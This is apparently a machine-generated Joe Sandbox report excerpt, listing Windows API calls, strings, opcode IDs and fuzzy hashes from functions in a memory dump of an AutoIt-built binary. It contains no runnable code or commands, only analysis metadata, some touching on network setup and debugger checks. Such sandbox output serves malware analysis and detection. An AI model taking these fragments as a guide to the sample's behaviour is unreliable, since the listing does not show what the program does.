                                              • Instruction Fuzzy Hash: 3B21477266420AAFDB04DFB8CC45EFA7BE8EB48304F004558FD55D3250DA74E850DB50
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00BB6FC7
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BB6FD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: d44a9b7ef554caad90bea8986f5af453cd3703239462cacd5d8130e0bab5ef55
                                              • Instruction ID: 985b296a9333f9dee1630083b9c55b36e7a1523637ec75583c9a2e85799ce4ae
                                              • Opcode Fuzzy Hash: d44a9b7ef554caad90bea8986f5af453cd3703239462cacd5d8130e0bab5ef55
                                              • Instruction Fuzzy Hash: 9E118C71110208AFEB109E64EC80EFB3BAAEB14368F1047A4F964931E0CBB9DC50DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00B931C9
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B931E8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 7d6f722693a4667b2a5918c8c268410d2310d5ff722597b08363c41f6ee26aaf
                                              • Instruction ID: dd4c8abc0b671c0fe378bcb28647d801ca91d8ce3138b1c36c59f294634ac8f5
                                              • Opcode Fuzzy Hash: 7d6f722693a4667b2a5918c8c268410d2310d5ff722597b08363c41f6ee26aaf
                                              • Instruction Fuzzy Hash: 3B11BE31900224ABDF20DA98DC45BA977F8EB05B10F2501F1E806B72B0DB71AF05CA92
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BA28F8
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BA2921
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 90b94ce752ad089f7bf539c7d0fdfb80538ca2a53e99844f52ae9d330b1d3a9e
                                              • Instruction ID: 5c955321acaede1a9c5b22c9d8dba65379aba64e5fe19000f837af82edf2f4d7
                                              • Opcode Fuzzy Hash: 90b94ce752ad089f7bf539c7d0fdfb80538ca2a53e99844f52ae9d330b1d3a9e
                                              • Instruction Fuzzy Hash: D511E070509225BAEB298F558C88EBBFBECFF06750F1082AAF90556100E3746C94D6F0
                                              APIs
                                                • Part of subcall function 00BA86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00BA849D,?,00000000,?,?), ref: 00BA86F7
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BA84A0
                                              • htons.WSOCK32(00000000,?,00000000), ref: 00BA84DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: ac91ae6b035688ec5dce54ba1850d1d0999ee07edede010415619a7ca214f96b
                                              • Instruction ID: bc606d75e43a8798db57761b0e90edc5a9af5a09fa3c26f54ff0da4b406eeb04
                                              • Opcode Fuzzy Hash: ac91ae6b035688ec5dce54ba1850d1d0999ee07edede010415619a7ca214f96b
                                              • Instruction Fuzzy Hash: 1511C275504206ABDB14AF64CC46FAEB3A4EF09310F108596E91157792DF31A910D795
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B89A2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: da8e5e2fe0db95ab35982e9c34f2ec2255778879b0b856d8accb4c5b9788adc5
                                              • Instruction ID: 12be8e08ca72b01d0eaf1e657d897e3a993481367f5114d908c98652c5a61d67
                                              • Opcode Fuzzy Hash: da8e5e2fe0db95ab35982e9c34f2ec2255778879b0b856d8accb4c5b9788adc5
                                              • Instruction Fuzzy Hash: F3019275A41218AB8F14FBA8CC91CFE77E9EF56320B140A99F872572E1DA305948D760
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: be692c169a073065765540c9882864256d6731bf9d85093aa5405ca92e30a892
                                              • Instruction ID: a644946ae58681f9e617145d5e2f2386c195d51289a8e18762e8d4066b44c609
                                              • Opcode Fuzzy Hash: be692c169a073065765540c9882864256d6731bf9d85093aa5405ca92e30a892
                                              • Instruction Fuzzy Hash: 3801F9728042587EDF28CBA8C856FBE7BF8DB05301F0041DEF552D21C1E5B4A6088760
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B89923
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: c1ed4deffc7fec1209a64716c2554987587573f3ac4af417969373f6296df57c
                                              • Instruction ID: 0c2966211b7fae103ded5e2ed8ebdad1f4db60d252344ea3b545ce360e5a8bbf
                                              • Opcode Fuzzy Hash: c1ed4deffc7fec1209a64716c2554987587573f3ac4af417969373f6296df57c
                                              • Instruction Fuzzy Hash: E101D475E411086BCB14FBA4C952EFE73ECDF55340F140199B812632A1DA145F08E7B1
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B899A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 08c25ac9e787f6497b5672db108a80bb7a3683fa595e413d29188173af2c912a
                                              • Instruction ID: bec8cd385de30cd0a0a3e4279d4a673028319e762d45f386f710f49735675827
                                              • Opcode Fuzzy Hash: 08c25ac9e787f6497b5672db108a80bb7a3683fa595e413d29188173af2c912a
                                              • Instruction Fuzzy Hash: F801A772E41118A6CF10FBA4C952EFE77ECDF11340F140199B845A32A1DA145F48D771
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: 059fcbb0a69073b75b159b95377b02419bd827f1d2058ff86ff5abb4652964e7
                                              • Instruction ID: aa63ea7ca39a86b10400749b82905827f9e102b871404f639b4851872bc60f31
                                              • Opcode Fuzzy Hash: 059fcbb0a69073b75b159b95377b02419bd827f1d2058ff86ff5abb4652964e7
                                              • Instruction Fuzzy Hash: AEE09B7250022957D720A699AC45FA7FBECDB59761F000097BD04D7151DA60994587D0
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B888A0
                                                • Part of subcall function 00B53588: _doexit.LIBCMT ref: 00B53592
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: 95fa70951044662c279326d7864b129140ea670484d72c7db1be6238809b65a5
                                              • Instruction ID: c9ff820b61b262bf6c9b107306830df34dbe91b83ee454aff66fe5a76aef19c0
                                              • Opcode Fuzzy Hash: 95fa70951044662c279326d7864b129140ea670484d72c7db1be6238809b65a5
                                              • Instruction Fuzzy Hash: 5DD05B3138535832D25536E86C1BFCA7ACCCB05B51F1444FAFF08652D34ED5999092E5
                                              APIs
                                                • Part of subcall function 00B6B544: _memset.LIBCMT ref: 00B6B551
                                                • Part of subcall function 00B50B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B6B520,?,?,?,00B3100A), ref: 00B50B79
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00B3100A), ref: 00B6B524
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B3100A), ref: 00B6B533
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B6B52E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: aff06f0cc05f8db8d08c255067862a64193d214d4d4998f86192f08890eb0572
                                              • Instruction ID: f7dd19cd96e0de662aa459740e7cfc7dfabb00269c66b9322d035b8733889bf7
                                              • Opcode Fuzzy Hash: aff06f0cc05f8db8d08c255067862a64193d214d4d4998f86192f08890eb0572
                                              • Instruction Fuzzy Hash: D6E06D712103518BD720AF25E815B42BBF0AF18705F1089EEE886C7342EFB9D544CB92
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00B70091
                                                • Part of subcall function 00BAC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00B7027A,?), ref: 00BAC6E7
                                                • Part of subcall function 00BAC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BAC6F9
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B70289
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: c373fdbef7cf3b763d8e49c4f77ca7eb93e36afa1c8e60118066544f5eaf80f9
                                              • Instruction ID: eab8b939ae29e4f87b099fd9a5ec7c498961c1def6f9b1515b7f3783a6efea91
                                              • Opcode Fuzzy Hash: c373fdbef7cf3b763d8e49c4f77ca7eb93e36afa1c8e60118066544f5eaf80f9
                                              • Instruction Fuzzy Hash: 5DF0C9B1825109DFCB25EBA4C998BECBBF8AB08310F2440D6E15AB7190DB714F84DF21
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00B99EB5
                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B99ECC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 2eb8a8068512ae1ba7713d527782926618e36e9f1038762268d0b8af3cfd14ad
                                              • Instruction ID: 915271614cc5d006d6ed8c55fa79c1a993cdef644b0e0f17f0f987e0763cab5e
                                              • Opcode Fuzzy Hash: 2eb8a8068512ae1ba7713d527782926618e36e9f1038762268d0b8af3cfd14ad
                                              • Instruction Fuzzy Hash: 96D05E7654030DABDB50ABD0DC0EFDBBB7CDB08700F0042A1BE58961A2DE7055948B91